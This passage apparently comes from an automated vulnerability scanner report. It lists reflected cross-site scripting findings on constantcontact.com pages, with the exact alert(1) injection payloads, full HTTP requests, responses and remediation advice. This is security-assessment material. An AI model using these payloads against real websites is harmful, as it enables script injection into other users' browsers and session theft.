Host: www.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000; mbox=check#true#1290653400|session#1290653339802-62786#1290655200

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:29:49 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=3A9947A2969115437905008636316ADA.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:49 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:49 GMT; Path=/
Set-Cookie: cclp_partner="prt_02_ts=21510989|prt_01_ts=21510869|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:49 GMT; Path=/
Set-Cookie: cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://www.constantcontact.com/47a5c%3balert(1)//945ccb545ca|partner.name=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:49 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 20894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Foun
...[SNIP]...
<![CDATA[
s.pageName='/ab77c';alert(1)//29b98d35938/index.jsp';
s.server='532';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca';
s.campaign='IMP_143029301421510';
s.prop1=''
...[SNIP]...

2.177. http://www.constantcontact.com/global-nav.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /global-nav.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b206'%3balert(1)//b4df50705c7 was submitted in the REST URL parameter 1. This input was echoed as 5b206';alert(1)//b4df50705c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /5b206'%3balert(1)//b4df50705c7 HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000; mbox=check#true#1290653400|session#1290653339802-62786#1290655200

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:29:48 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=A4DD2F640511ECC143E007BE446D68B9.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:48 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:48 GMT; Path=/
Set-Cookie: cclp_partner="prt_02_ts=21510989|prt_01_ts=21510869|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:48 GMT; Path=/
Set-Cookie: cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://www.constantcontact.com/47a5c%3balert(1)//945ccb545ca|partner.name=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:48 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 20894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Foun
...[SNIP]...
<![CDATA[
s.pageName='/5b206';alert(1)//b4df50705c7/index.jsp';
s.server='532';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca';
s.campaign='IMP_143029301421510';
s.prop1=''
...[SNIP]...

2.178. http://www.constantcontact.com/index.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /index.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47a5c'%3balert(1)//945ccb545ca was submitted in the REST URL parameter 1. This input was echoed as 47a5c';alert(1)//945ccb545ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /47a5c'%3balert(1)//945ccb545ca HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 02:29:15 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 02:29:15 GMT; Path=/
Set-Cookie: cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 02:29:15 GMT; Path=/
Set-Cookie: cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 02:29:15 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerProdLP=2219185162.20480.0000; path=/
Content-Length: 21087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/47a5c';alert(1)//945ccb545ca/index.jsp';
s.server='532';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='';
s.prop1='';
s.prop2='20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landing
...[SNIP]...

2.179. http://www.constantcontact.com/learning-center/glossary/social-media/index.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /learning-center/glossary/social-media/index.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0cb7'%3balert(1)//4a2bda63320 was submitted in the REST URL parameter 1. This input was echoed as a0cb7';alert(1)//4a2bda63320 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /learning-centera0cb7'%3balert(1)//4a2bda63320/glossary/social-media/index.jsp HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:49 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=976EDA797A7DCE51A32FF15C42085F9B.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:49 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:49 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:49 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:49 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/learning-centera0cb7';alert(1)//4a2bda63320/glossary/social-media/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E2
...[SNIP]...

2.180. http://www.constantcontact.com/learning-center/glossary/social-media/index.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /learning-center/glossary/social-media/index.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a384'%3balert(1)//45175db367e was submitted in the REST URL parameter 2. This input was echoed as 6a384';alert(1)//45175db367e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /learning-center/glossary6a384'%3balert(1)//45175db367e/social-media/index.jsp HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:58 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=88728E474EF966E72359E6AB85304266.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:58 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:58 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:58 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:58 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/learning-center/glossary6a384';alert(1)//45175db367e/social-media/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28
...[SNIP]...

2.181. http://www.constantcontact.com/learning-center/glossary/social-media/index.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /learning-center/glossary/social-media/index.jsp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e76a'%3balert(1)//ab8d1201eb7 was submitted in the REST URL parameter 3. This input was echoed as 9e76a';alert(1)//ab8d1201eb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /learning-center/glossary/social-media9e76a'%3balert(1)//ab8d1201eb7/index.jsp HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:55:04 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=FEBE28237641159D2EE5C627363C71A7.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:04 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:04 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511015|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:04 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:04 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/learning-center/glossary/social-media9e76a';alert(1)//ab8d1201eb7/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.182. http://www.constantcontact.com/learning-center/glossary/social-media/index.jsp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /learning-center/glossary/social-media/index.jsp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 514c8'%3balert(1)//ec972dfd61a was submitted in the REST URL parameter 4. This input was echoed as 514c8';alert(1)//ec972dfd61a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /learning-center/glossary/social-media/514c8'%3balert(1)//ec972dfd61a HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:55:07 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=22AF4F621DDE81292C2B1DB246C1CFCA.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:07 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:07 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511015|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:07 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:07 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21220

